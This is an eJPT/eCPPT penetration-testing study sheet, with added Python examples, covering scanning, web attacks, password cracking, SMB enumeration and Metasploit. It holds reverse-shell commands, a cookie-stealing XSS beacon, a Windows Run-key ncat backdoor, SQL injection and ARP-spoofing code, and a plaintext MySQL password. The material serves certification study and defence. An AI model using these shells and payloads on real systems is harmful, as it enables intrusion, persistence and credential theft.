> For the complete documentation index, see [llms.txt](https://www.battlecoder.com/battlecoder/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.battlecoder.com/battlecoder/notes/ejpt-ecppt-notes.md).

# eJPT/eCPPT Notes

### Methodology

#### Testing Checklist

* Refer to the OWASP Testing Checklist: [Testing Checklist](https://wiki.owasp.org/index.php/Testing_Checklist)

### Routing

#### Check Routes

* Command: `route` (net-tools; on current distributions use `ip route show`)

#### Add Route

* Command: `ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>`

### Start Python Server

* Recommended to change into `/tmp` directory
* Command: `python -m SimpleHTTPServer 8080` (Python 2); on Python 3 use `python3 -m http.server 8080`
* Put things in the same directory to access them via a webpage

### Web

#### Netcat

* Start a connection: `nc -v hack.me 80`
  * Make GET request (the header block ends with an empty line, so press Enter twice):

    ```plaintext
    GET / HTTP/1.1
    Host: hack.me

    ```
  * Only works for plaintext HTTP; for TLS use OpenSSL (next section)

#### For HTTPS use OpenSSL

* Command: `openssl s_client -connect hack.me:443`
  * Use `-debug`, `-state` for more info
  * Use `-quiet` to remove connection info

### Information Gathering

#### Open Source

* **Crunchbase**: IT startup database, information about founders, investors, employees, buyouts, acquisitions
* **Whois Database**: Owner name, address, email, technical contacts

#### Subdomain Enumeration

**Passive Enumeration**

* Google query: `site:company.com`
* Tools:
  * [dnsdumpster.com](https://dnsdumpster.com)
  * [virustotal.com](https://virustotal.com): Search cached DNS subdomains
  * [crt.sh](https://crt.sh): Searches Certificate Transparency logs; certificates issued for a domain reveal valid subdomains
  * Inspecting certificates on domains (Subject Alternative Name entries) may lead to more subdomains

**Tools for Subdomain Enumeration**

* **sublist3r**:
  * Command: `sublist3r -d google.com`
  * Has brute force option (`-b`) that parses the provided wordlist
* **amass**:
  * Install:

    ```plaintext
    apt install snapd
    service snapd start
    snap install amass
    ```
  * Example: `snap run amass -ip -d google.com` (older syntax; current releases use the `enum` subcommand: `amass enum -ip -d google.com`)

### Footprinting & Scanning

#### Mapping a Network

* **fping** performs a ping sweep on an IP range:
  * Commands:

    ```plaintext
    fping -a -g 10.54.12.0/24
    fping -a -g 10.54.12.0 10.54.12.255
    fping -a -g 10.54.12.0/24 2>/dev/null
    ```
* **nmap** can perform ping scans with the `-sn` flag:
  * Command:

    ```plaintext
    nmap -sn 200.200.0.0/16
    nmap -sn 200.200.123.1-12
    nmap -sn 172.16.12.*
    nmap -sn 200.200.12-13.*
    nmap -sn -iL <file_with_hosts>
    ```

#### OS Fingerprinting

* **nmap** can fingerprint OS with `-O` flag, use `-Pn` flag to skip ping:
  * Command: `nmap -O -Pn <targets>`

#### Port Scanning

* **TCP Connect Scan** (`-sT`, full handshake, so the target service sees and may log a real connection):
  * SYN -> <- SYN + ACK
  * ACK -> then RST -> (closes connection)
* **SYN Scan** (`-sS`, half-open; needs raw sockets, so usually root):
  * SYN -> <- SYN + ACK
  * RST -> (handshake never completed)
* **Scanning Closed Port**:
  * SYN -> <- RST + ACK (port is closed)
* **Filtered Port**:
  * SYN -> no reply (or ICMP unreachable): the probe is being dropped, usually by a firewall

**nmap Port Scanning**

* Common Flags:
  * `-sT`: TCP connect scan
  * `-sS`: SYN scan
  * `-sV`: Version detection
  * `-Pn`: Skips ping sweep, useful if network has firewalls or blocks ICMP packets

#### Spotting Firewall

* Incomplete nmap results on well-known services like a web server:
  * Example: “http?” or “tcpwrapped” means the handshake completed but the remote host closed the connection without sending any data (typical of TCP wrappers or a filtering proxy)
  * Use `nmap --reason` to see which packet (SYN/ACK, RST, no response) made nmap mark a port open, closed or filtered
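
The connect scan and the open/closed/filtered distinction above, as an added Python example that is not part of the original notes: it completes the handshake like `nmap -sT`, maps a refused connection (RST) to closed and a timeout to filtered, and opens a throw-away listener on loopback so it can be checked without a target. Host and ports are placeholders.

```python
import socket


def connect_scan(host, ports, timeout=1.0):
    """TCP connect() scan, what nmap -sT does.

    connect() completes the whole handshake (SYN, SYN/ACK, ACK), so the target
    service sees a real connection and may log it; close() then tears it down.
    Returns {port: "open" | "closed" | "filtered"}:
      open      handshake completed
      closed    SYN answered with RST/ACK (ConnectionRefusedError)
      filtered  nothing came back before the timeout (or ICMP unreachable):
                the SYN is being dropped, most often by a firewall
    """
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            results[port] = "open"
        except ConnectionRefusedError:
            results[port] = "closed"
        except OSError:  # timeout (TimeoutError) or host/network unreachable
            results[port] = "filtered"
        finally:
            s.close()
    return results


def start_dummy_listener(host="127.0.0.1"):
    """Bind a throw-away listener on an ephemeral loopback port so there is a
    known-open port to scan. The kernel completes handshakes into the backlog,
    so no accept() loop is needed. Returns (port, socket); close() it when done."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv.getsockname()[1], srv


if __name__ == "__main__":
    port, srv = start_dummy_listener()
    print(connect_scan("127.0.0.1", [port, 22, 80, 443]))  # the dummy port reports open
    srv.close()
    print(connect_scan("127.0.0.1", [port]))  # now refused: closed
```

Because connect() finishes the handshake, the listener's backlog fills with real connections; that is exactly why `-sT` is noisier than `-sS` on a target that logs accepted connections.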

#### masscan

* Used for scanning large networks quickly, not as accurate as nmap:
  * Example:

    ```plaintext
    ./masscan -p 80,443,22 -Pn --rate=800 --banners 10.142.111.0/24 -e tap0 --router-ip 10.142.111.1 --echo > masscan.txt
    ```

### Vulnerability Assessment

#### Nessus

* Popular vulnerability scanner, uses a client & server:
  * Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database
  * Prone to false positives

**Installing Nessus**

* Command: `dpkg -i nessus.deb`

**Usage**

* Commands:

  ```plaintext
  service nessusd start
  ```
* Open web interface (may need to add security exception)
* Setup custom policy and scan using GUI, export results

### Web Attacks

#### Web Server Fingerprinting

* **Netcat**:
  * Command: `nc <target_ip> 80`
  * After connecting, send a valid HTTP request (note the space after `/`; finish with an empty line):

    ```plaintext
    HEAD / HTTP/1.1
    Host: <target_ip>

    ```
  * Netcat only works on HTTP websites, for HTTPS use OpenSSL:
    * Command: `openssl s_client -connect target.site:443`
    * Example (HTTP/1.0 does not require a Host header):

      ```plaintext
      HEAD / HTTP/1.0

      ```

**Automated Fingerprinting Tool httprint**

* Example: `httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txt`
* Flags:
  * `-P0`: Not ping web server
  * `-h`: Define host
  * `-s`: Define signature file

#### HTTP Verbs

* Every request ends its header block with an empty line (CRLF CRLF); over netcat that means pressing Enter twice
* **GET**: Used to request resource

  ```plaintext
  GET /page.php HTTP/1.1
  Host: www.example.com

  ```
* **POST**: Used to submit HTML form data; the body follows the empty line and needs a `Content-Length` (30 bytes here)

  ```plaintext
  POST /login.php HTTP/1.1
  Host: www.example.com
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 30

  username=John&password=yourmom
  ```
* **HEAD**: Used to grab headers only (same response as GET without the body)

  ```plaintext
  HEAD / HTTP/1.1
  Host: www.example.com

  ```
* **PUT**: Used to upload file to server (only where the server allows it; check with OPTIONS)

  ```plaintext
  PUT /path/to/destination HTTP/1.1
  Host: www.example.com
  Content-Length: <size_in_bytes>

  <Put data>
  ```

  * You must know the size in bytes of the file you are trying to upload (`wc -c`; `wc -m` counts characters, which only matches for plain ASCII)
  * Example:

    ```plaintext
    wc -c payload.php
    20 payload.php

    PUT /payload.php HTTP/1.1
    Host: www.example.com
    Content-Type: text/html
    Content-Length: 20

    <?php phpinfo(); ?>
    ```
* **DELETE**: Used to remove file from server

  ```plaintext
  DELETE /path/to/destination HTTP/1.1
  Host: www.example.com

  ```
* **OPTIONS**: Used to query web server for available HTTP verbs (returned in the `Allow` header)

  ```plaintext
  OPTIONS / HTTP/1.1
  Host: www.example.com

  ```
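
Added example (not from the original notes): a small Python builder for the raw requests above that computes `Content-Length` itself, plus a parser for the response that extracts the `Allow` header from an OPTIONS reply. `www.example.com` and the sample response are constructed, not captured from a real server.

```python
import socket

CRLF = "\r\n"


def build_request(method, path, host, body=b"", headers=None, version="HTTP/1.1"):
    """Return the raw bytes of an HTTP request.

    Content-Length is computed from the body, so a PUT or POST never has to be
    sized by hand with wc. The header block is terminated by an empty line,
    which is the part people forget when typing requests into netcat.
    """
    if isinstance(body, str):
        body = body.encode()
    hdrs = {"Host": host, "Connection": "close"}  # HTTP/1.1 requires Host
    if body:
        hdrs["Content-Length"] = str(len(body))
        hdrs["Content-Type"] = "application/x-www-form-urlencoded"
    if headers:
        hdrs.update(headers)  # caller-supplied headers override the defaults
    lines = [f"{method} {path} {version}"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return (CRLF.join(lines) + CRLF + CRLF).encode() + body


def parse_response(raw):
    """Split a raw response into (status_code, headers, body).

    Header names are lower-cased because HTTP header names are case-insensitive.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def allowed_methods(raw_options_response):
    """Verbs advertised in the Allow header of an OPTIONS response."""
    _, headers, _ = parse_response(raw_options_response)
    return [m.strip() for m in headers.get("allow", "").split(",") if m.strip()]


def send_request(host, port, request, timeout=5):
    """Plain-TCP send/receive, the same thing as piping the request into nc (HTTP only, no TLS)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed sample response (not captured from a real server) so the parser can be tried offline.
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.41\r\n"
    b"Allow: GET, HEAD, POST, OPTIONS, PUT, DELETE\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(build_request("POST", "/login.php", "www.example.com",
                        "username=John&password=yourmom").decode())
    print(build_request("PUT", "/payload.php", "www.example.com",
                        "<?php phpinfo(); ?>\n", {"Content-Type": "text/html"}).decode())
    print(allowed_methods(SAMPLE_OPTIONS_RESPONSE))
```

Against a live target, `send_request(host, 80, build_request("OPTIONS", "/", host))` followed by `allowed_methods` tells you whether PUT and DELETE are advertised before you try the upload described above.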

### Netcat

#### Setup nc Listener or Server

* Command: `nc -lvp 8888`
* Connect to nc listener: `nc -v 127.0.0.1 8888`
* To make connection UDP: Add `-u`
* Sending file over nc:
  * Command: `cat tobesent.txt | nc -v 127.0.0.1 8888` (receiving side: `nc -lvp 8888 > received.txt`)
* Bind Shell (the listener runs the shell and the attacker connects in):
  * Command: `nc -lvp 1337 -e /bin/bash`
* Reverse Shell (the target connects back to a listener on the attacker):
  * Attacker: `nc -lvp 1337`
  * Target: `nc <attacker_ip> 1337 -e /bin/bash`
* `-e` exists in the traditional netcat and in ncat; the OpenBSD netcat shipped on Debian/Kali does not have it

### Dirbuster / Dirb

#### Dirbuster

* GUI based directory enumerator

#### Dirb

* Command line based directory enumerator

**Basic Usage**

* Commands:

  ```plaintext
  apt install dirb
  dirb http://google.com
  dirb http://google.com /usr/share/dirb/wordlists/small.txt
  ```

**Common Flags**

* `-a "<agent_string>"`: Change the user agent so requests look like they come from a browser (see useragentstring.com)
* `-c "COOKIE: XYZ"`: Specifies cookie in request
* `-u "admin:password"`: HTTP basic auth credentials for the request
* `-H "My Header: My content"`: Add header into request
* `-r`: Don't search recursively into found sub directories
* `-z 1000`: Adds a 1000 ms delay between requests (about one request a second)
* `-S`: Silent mode (capital S): only displays items that were found
* `-X ".php,.bak"`: Append extensions to each word
* `-x extensions.txt`: Read the extensions from a file
* `-o results.txt`: Save results to an output file

**Run dirb through Proxy “Burp”**

* Command: `dirb http://google.com -p http://127.0.0.1:8080`

### MySQL

#### Login to MySQL Server

* Command:

  ```plaintext
  mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198
  ```

  * `-u` for user
  * `-p` for password, written directly after the flag with no space; give `-p` on its own to be prompted, so the password stays out of shell history and `ps` output

### Google Dorking

* **site**: Only include results from specified host
* **intitle**: Filters results based on title of page
* **inurl**: Text included in URL
* **filetype**: Used to search for specific file extensions .pdf, .xls
* **OR, |**: Match either term (separate terms are combined with AND by default)
* **-**: Used to filter out words

### Cross-Site Scripting (XSS)

#### Overview

* Occurs when a web application uses unfiltered user input to build the output it sends to its users; the attacker then controls HTML and JavaScript that runs in the victim's browser, so the target is the application's user, not the server.

#### User Input

* Any parameter coming from client side of web app such as:
  * Request headers
  * Cookies
  * Form inputs
  * POST parameters
  * GET parameters

#### Payloads

* **Alert that XSS is there** (proof of execution):

  ```html
  <script>alert("oh boy xss");</script>
  ```
* **Display cookies** (shows the payload can read `document.cookie`):

  ```html
  <script>alert(document.cookie);</script>
  ```
* **Steal cookies and send them to attacker controlled site** (the attacker logs the request, e.g. with a web server or `nc -lvp 80`; cookies set with the `HttpOnly` flag are not visible to `document.cookie`):

  ```html
  <script>
  var i = new Image();
  i.src="http://192.168.99.11/get.php?cookies="+document.cookie;
  </script>
  ```
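
Added example, not from the original notes: the reflection bug this section describes in a few lines of Python, the same output with proper HTML escaping, and a check for the `HttpOnly` flag that blunts the cookie-stealing payload. The hypothetical `name` parameter and the `Set-Cookie` strings are constructed.

```python
import html

# Constructed payloads: the two from the notes plus one for the attribute context.
PAYLOADS = [
    '<script>alert("oh boy xss");</script>',
    '<script>var i=new Image();i.src="http://192.168.99.11/get.php?cookies="+document.cookie;</script>',
    '" onmouseover="alert(1)',  # closes the quoted attribute and adds an event handler
]


def render_vulnerable(name):
    """Reflects the hypothetical `name` parameter unfiltered into both an
    element body and a quoted attribute, the bug the section describes."""
    return f'<p>Hello, {name}</p><input value="{name}">'


def render_safe(name):
    """Same page with output encoding: html.escape(quote=True) turns < > & " '
    into entities, so the input can only ever be text in either context."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello, {safe}</p><input value="{safe}">'


def missing_cookie_flags(set_cookie_value):
    """Which of HttpOnly / Secure a Set-Cookie value lacks. HttpOnly hides the
    cookie from document.cookie, so the beacon payload above gets nothing."""
    attrs = {a.strip().lower() for a in set_cookie_value.split(";")[1:]}
    return [f for f in ("HttpOnly", "Secure") if f.lower() not in attrs]


if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable:", render_vulnerable(p))
        print("safe:      ", render_safe(p))
    print(missing_cookie_flags("PHPSESSID=abc123; Path=/"))  # constructed header value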

### SQL

#### Example Query

* Command:

  ```plaintext
  SELECT name, description FROM products WHERE id=9;
  ```

#### Web App Use

* In order for a web app to use database it must:
  * Connect to database
  * Submit query
  * Retrieve results before applications can use results

#### Example SQL Injection

* Command:

  ```plaintext
  ' OR 'a' ='a
  ' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a
  ```

  * The first makes the `WHERE` clause always true (e.g. login bypass); the second appends rows from another table, which only works when the `UNION` selects as many columns as the original query

#### Finding Injection Points

* Test every supplied user input used by the web app:
  * GET parameters
  * POST parameters
  * HTTP headers:
    * User-Agent
    * Cookie
    * Accept

#### Input SQL Injection

* String terminators: `'`, `"`
* Commands: `SELECT`, `UNION`
* SQL Comments: `#` (MySQL only), `-- ` (needs a trailing space in MySQL, which is why payloads end in `-- -`), `/* */`

#### SQL Functions

* Commands:

  ```plaintext
  show databases;         // shows databases
  use selected_db;        // replace selected_db with db
  show tables;            // shows tables in selected db
  select * from flag;     // shows all records in flag
  update users set adm="yes" where username="tracking1";   // update records in db
  ```

#### More Commands

* `SELECT user();` // displays current database user
* `select substring(user(), 1, 1) = 'r';` // returns 1 (true) or 0 (false); one such yes/no question per character is how boolean-based blind injection recovers values the page never displays

#### Union Based Injection

* Commands (the column count must match the original query: add `null`s until the error disappears, then replace them with markers to see which column is reflected):

  ```plaintext
  ' UNION SELECT null -- -
  ' UNION SELECT null, null -- -            // no error: the original query has two columns
  ' UNION SELECT 'els1', 'els2' -- -        // shows which column is reflected in the page
  ' UNION SELECT user(), database() -- -
  ```
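
The injection, UNION and substring techniques from the last four sections, as an added Python example against an in-memory SQLite database (not from the original notes; the `products` and `Accounts` tables and their rows are constructed). SQLite has no `user()`, so the boolean-based probe extracts a password column instead, one character per query, and the parameterised lookup shows why the same payloads do nothing against bound parameters.

```python
import sqlite3
import string


def make_db():
    """In-memory stand-in for the notes' products and Accounts tables (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        INSERT INTO products VALUES (9, 'Widget', 'A small widget');
        INSERT INTO products VALUES (10, 'Gadget', 'A large gadget');
        CREATE TABLE Accounts (Username TEXT, Password TEXT);
        INSERT INTO Accounts VALUES ('admin', 'r00tpass');
        INSERT INTO Accounts VALUES ('tracking1', 'winter2024');
    """)
    return db


def product_lookup_vulnerable(db, name):
    """The injection point: user input is pasted into the query string, so a quote
    in `name` ends the string literal and the rest becomes SQL."""
    sql = "SELECT name, description FROM products WHERE name='" + name + "'"
    return db.execute(sql).fetchall()


def product_lookup_safe(db, name):
    """Bound parameter: the driver sends the value separately, so quotes,
    OR and UNION inside it are just characters in a product name."""
    return db.execute(
        "SELECT name, description FROM products WHERE name=?", (name,)
    ).fetchall()


def boolean_extract(db, inner_select, charset=string.ascii_letters + string.digits + "_"):
    """Boolean-based blind extraction, the idea behind substring(user(),1,1)='r'.
    The vulnerable lookup is the oracle: a true condition returns rows, a false
    one returns nothing. One character is recovered per position."""
    out = ""
    while True:
        for c in charset:
            probe = f"x' OR substr(({inner_select}),{len(out) + 1},1)='{c}"
            if product_lookup_vulnerable(db, probe):
                out += c
                break
        else:
            return out  # no character matched: the value has ended


if __name__ == "__main__":
    db = make_db()
    print(product_lookup_vulnerable(db, "Widget' OR 'a'='a"))          # every product
    print(product_lookup_vulnerable(db, "x' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a"))
    print(product_lookup_safe(db, "Widget' OR 'a'='a"))                # [] : treated as a name
    print(boolean_extract(db, "SELECT Password FROM Accounts WHERE Username='admin'"))
```

The UNION payload works only because `Accounts` is selected with the same two columns as the original `name, description` query; the blind probe needs no output column at all, just the row/no-row difference, which is what sqlmap's boolean-based technique (`--technique=B`) automates.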

### SQLMap

#### Overview

* Open source penetration testing tool that automates process of detecting SQL injection
* Capable of both detecting and exploiting
* Always recommended to test by hand first to avoid crashing DB

#### Basic Syntax

* Command:

  ```plaintext
  sqlmap -u <URL> -p <injection_parameters> [options]
  ```

#### Examples

* Command:

  ```plaintext
  sqlmap -u 'http://victim.site/view.php?id=1' -p id --technique=U
  ```

  * Test the id parameter of the GET request for view\.php, tells sqlmap to use UNION based injection
* To test POST request:

  ```plaintext
  sqlmap -u <URL> --data=<POST_String> -p parameter [options]
  ```
* Command:

  ```plaintext
  sqlmap -u http://sql.site/view.php?id=1
  sqlmap -u http://sql.site/view.php?id=1 -b                            // banner (DBMS version)
  sqlmap -u http://sql.site/view.php?id=1 --current-db                  // name of the database in use (takes no argument)
  sqlmap -u http://sql.site/view.php?id=1 -D selfie4u --tables          // tables of that database
  sqlmap -u http://sql.site/view.php?id=1 -D selfie4u -T <table> --columns
  sqlmap -u http://sql.site/view.php?id=1 -D selfie4u -T <table> --dump
  ```

#### More SQLMap Syntax

* `-v 3`: Displays the payloads/queries used
* `--users`: Enumerate DBMS users
* `--dbs`: Enumerate the databases on the server
* `-D dbname --tables`: Specify db and enumerate tables
* `-D dbname -T table --columns`: Grab columns from the specified table
* `-D dbname -T table -C col1,col2 --dump`: Dump records of the specified columns
* `--data='user=a&pass=a'`: POST injection, grab the POST body from Burp Suite

### Metasploit SQL Enumeration

* Use `auxiliary/scanner/mssql/mssql_login` (Microsoft SQL Server); the MySQL equivalent is `auxiliary/scanner/mysql/mysql_login`

### Backdoors

#### Hide ncat in the Windows System32 Directory

* Copy `ncat.exe` into `C:\Windows\System32` so it sits among system binaries; the Run key below points at that path

#### Forward Shell

* On Windows machine:

  ```plaintext
  ncat -l -p 5555 -e cmd.exe
  ```
* On attacker machine:

  ```plaintext
  ncat 192.168.0.25 5555
  ```

#### Reverse Shell

* On attacker machine:

  ```plaintext
  ncat -l -p 5555 -v
  ```
* On Windows machine:

  ```plaintext
  ncat -e cmd.exe 192.168.0.24 5555
  ```

#### Persistent Backdoor

1. Start listener on attacker machine
2. Open regedit on Windows machine
3. Navigate to `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
4. Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax: `"C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"`
5. The shell connects back at the next logon (Run keys execute when a user logs on); restart the victim machine or log off and on to trigger it

### Password Attacks

#### JohnTheRipper

* After acquiring `/etc/passwd` (user accounts) & `/etc/shadow` (password hashes, readable only by root), John needs user and hash in the same file:
  * Command:

    ```plaintext
    unshadow passwd shadow > crackme
    ```
  * Brute Force:

    ```plaintext
    john --incremental --users=<users_to_crack> <file_to_crack>
    ```
  * To display passwords recovered by John:

    ```plaintext
    john --show crackme
    ```
  * Cracked passwords are stored in `~/.john/john.pot`

**Dictionary Attack**

* Command:

  ```plaintext
  john --wordlist=custom_wordlist --rules <file_to_crack>
  ```
* Good wordlist to install:

  ```plaintext
  apt-get install seclists
  ```

#### Rainbow Tables

* Tables of pre-computed hash chains: the hashing work is done once up front and reused, trading disk space for cracking time. Useless against salted hashes, since every salt would need its own table.
* **Ophcrack**: Rainbow table password cracking tool for Windows LM/NTLM hashes

### Authentication Cracking

#### Hydra

* Online brute-force tool for network services such as HTTP, SSH, FTP, etc.
* Syntax:

  ```plaintext
  hydra -L users.txt -P pass.txt <service://server> <options>
  ```

**Configuring Hydra**

1. Inspect page source
2. Figure out how credentials are being sent to server (POST)
3. Figure out names of parameters being sent (pwd, usr)

* Example Webpage:

  ```plaintext
  hydra crackme.site http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou.txt -f -V
  ```

  * The form string is `<path>:<POST body with ^USER^ and ^PASS^ placeholders>:<text that appears in the response on a failed login>`

  * `-L`: List of user names
  * `-P`: List of passwords
  * `-f`: Hydra will stop after first credential found
  * `-V`: Verbosity
* Example SSH:

  ```plaintext
  hydra 192.168.102.143 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V
  ```

### Windows Shares

#### UNC or Universal Naming Convention Paths

* `\\servername\ShareName\file.net`

#### Administrative Shares

* `\\ComputerName\C$`: Lets admin access volume on local machine
* `\\ComputerName\admin$`: Points to the Windows installation directory
* `\\ComputerName\ipc$`: Used for interprocess communication

#### Null Sessions

* An anonymous (no username, no password) connection to the IPC$ share on Windows-based computers:
  1. Check and see if the target has any file server enabled
  2. `nbtstat -A 10.123.162.2` or `nbtstat /?` for help
  3. A `<20>` entry in the NetBIOS name table means the File Server service is running, i.e. the target is sharing files
  4. If file server is enabled, enumerate shares with `NET VIEW`
  5. `NET VIEW <target_ip>`
  6. Try to connect to share
  7. `NET USE \\<target_ip>\IPC$ "" /u:""` (connect to the IPC$ share without authentication)
* **enum**:
  * Script that automates enumeration of shares
  * Commands:

    ```plaintext
    enum -S <target_ip>  // enumerates shares
    enum -U <target_ip>  // enumerates users
    enum -P <target_ip>  // enumerates password policies
    ```
* **winfo**:
  * Another enumeration tool
  * Command:

    ```plaintext
    winfo <target_ip> -n  // -n for null session
    ```

#### Linux Version

1. `nmblookup -A <target_ip>` (NetBIOS name table, the equivalent of `nbtstat -A`)
2. `smbclient -L //<target_ip> -N` (lists shares; `-N` sends no password, i.e. a null session)

* Alternative: `smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U ""` (allows you to see services on target, `-N` forces no password)

3. `smbclient //<target_ip>/IPC$ -N` (connects to the IPC$ share without authentication)

* To open a specific share instead: `smbclient //<target_ip>/<target_share> -N`

#### Enumeration Scripts

* **enum4linux script**:
  * Enumerates shares
  * Brute force enumeration:

    ```plaintext
    enum4linux -s /usr/share/enum4linux/share-list.txt <target_ip>
    ```
* **samrdump.py**:
  * Enumerates info about users using null sessions
  * Command:

    ```plaintext
    cd /usr/share/doc/python-impacket-doc/examples && python samrdump.py <target_ip>
    ```
  * Current Kali packages install it as `impacket-samrdump <target_ip>`
* **nmap smb enumeration**:
  * Commands:

    ```plaintext
    nmap -p 445 --script=smb-enum-shares <target_ip>  # enumerates shares
    nmap -p 445 --script=smb-enum-users <target_ip>   # enumerates users
    nmap -p 445 --script=smb-brute <target_ip>        # brute force authentication
    ```

### ARP Poisoning

* Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.

#### Enable Packet Forwarding

* Command:

  ```plaintext
  echo 1 > /proc/sys/net/ipv4/ip_forward
  ```
* Without forwarding, the victims' traffic stops at the attacker and their connectivity drops, which gets noticed

#### Dsniff

* Tool used for ARP poisoning:
  * Example:

    ```plaintext
    arpspoof -i <interface> -t <target> -r <host>
    ```

    * `-i`: NIC
    * `-t` & `-r`: Victims
* You can then run Wireshark to see the traffic
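
Added example (not from the original notes): the unsolicited ARP reply that `arpspoof` sends, built byte by byte in Python, with a decoder that flags replies whose sender MAC does not match a known IP-to-MAC inventory. MAC addresses, IPs and the inventory are constructed; `send_frame` needs Linux and root and is not exercised by the sample.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(attacker_mac, spoofed_ip, victim_mac, victim_ip):
    """Unsolicited ARP reply "spoofed_ip is-at attacker_mac", addressed to the victim.
    The victim caches it and sends traffic for spoofed_ip (e.g. the gateway) to the
    attacker; arpspoof -t <target> -r <host> emits one of these in each direction."""
    ethernet = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(attacker_mac), socket.inet_aton(spoofed_ip),
                      mac_bytes(victim_mac), socket.inet_aton(victim_ip))
    return ethernet + arp  # 14 + 28 = 42 bytes


def parse_arp(frame):
    """Decode an Ethernet/ARP frame into a dict, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": "reply" if oper == ARP_REPLY else "request",
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def detect_poisoning(frames, known):
    """known: {ip: mac} from a trusted inventory. Returns the ARP replies that
    claim an inventoried IP with a different MAC, which is what poisoning looks like."""
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["op"] == "reply":
            expected = known.get(arp["sender_ip"])
            if expected is not None and expected != arp["sender_mac"]:
                alerts.append(arp)
    return alerts


def send_frame(frame, iface):
    """Put the frame on the wire (Linux only, needs root). Not exercised below."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    # Constructed addresses: gateway 10.0.0.1, victim 10.0.0.20, attacker de:ad:be:ef:00:01
    poisoned = build_arp_reply("de:ad:be:ef:00:01", "10.0.0.1", "00:aa:bb:cc:dd:ee", "10.0.0.20")
    legit = build_arp_reply("00:11:22:33:44:55", "10.0.0.1", "00:aa:bb:cc:dd:ee", "10.0.0.20")
    print(parse_arp(poisoned))
    print(detect_poisoning([legit, poisoned], {"10.0.0.1": "00:11:22:33:44:55"}))
```

The detection side is the same check tools like arpwatch perform: a static inventory (or the first-seen mapping) against every reply on the segment. Nothing in the reply authenticates the sender, which is why ARP has no defence against this short of static entries or switch-side Dynamic ARP Inspection.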

### Metasploit

#### Framework for Exploiting Machines

**Requirements Before Use**

* Commands:

  ```plaintext
  service postgresql start
  service metasploit start   // older Kali; current releases use: msfdb init
  ```

#### Start

* Command: `msfconsole`

#### Help

* Command: `help` (or `show -h` for what `show` can list)

#### Search

* Command: `search <search_term>`

#### Show All Exploits

* Command: `show exploits`

#### Use Exploit

* Command: `use exploit/windows/ftp/turboftp_port`

#### Go "Back"

* Command: `back`

#### Get Info About Exploit

* Command: `info`

#### See Exploit Options

* Command: `options`

#### Configure Exploit Parameters

* Command: `set`

#### See Available Payloads

* Command: `show payloads`

#### Set Payload

* Command:

  ```plaintext
  set payload windows/meterpreter/reverse_tcp
  ```

#### Launch Exploit/Payload

* Command: `exploit`

#### Create Listener

* Commands:

  ```plaintext
  use exploit/multi/handler
  set payload php/reverse_php               // one of these, matching the payload that will connect back
  set payload php/meterpreter_reverse_php
  set payload php/meterpreter_reverse_tcp
  set LHOST <attacker_ip>
  set LPORT <port>
  run
  ```

#### Upgrade to Meterpreter

* Commands:

  ```plaintext
  background                                  // put the current session in the background
  use post/multi/manage/shell_to_meterpreter
  set SESSION <id>
  run
  ```

#### Scan for SMB Vulnerabilities with nmap

* Command:

  ```plaintext
  nmap --script smb-check-vulns.nse --script-args=unsafe=1 <target_ip>
  ```
* `smb-check-vulns` was removed from recent nmap releases; use `nmap -p 445 --script smb-vuln* <target_ip>` instead

### Meterpreter

#### Advanced Shell

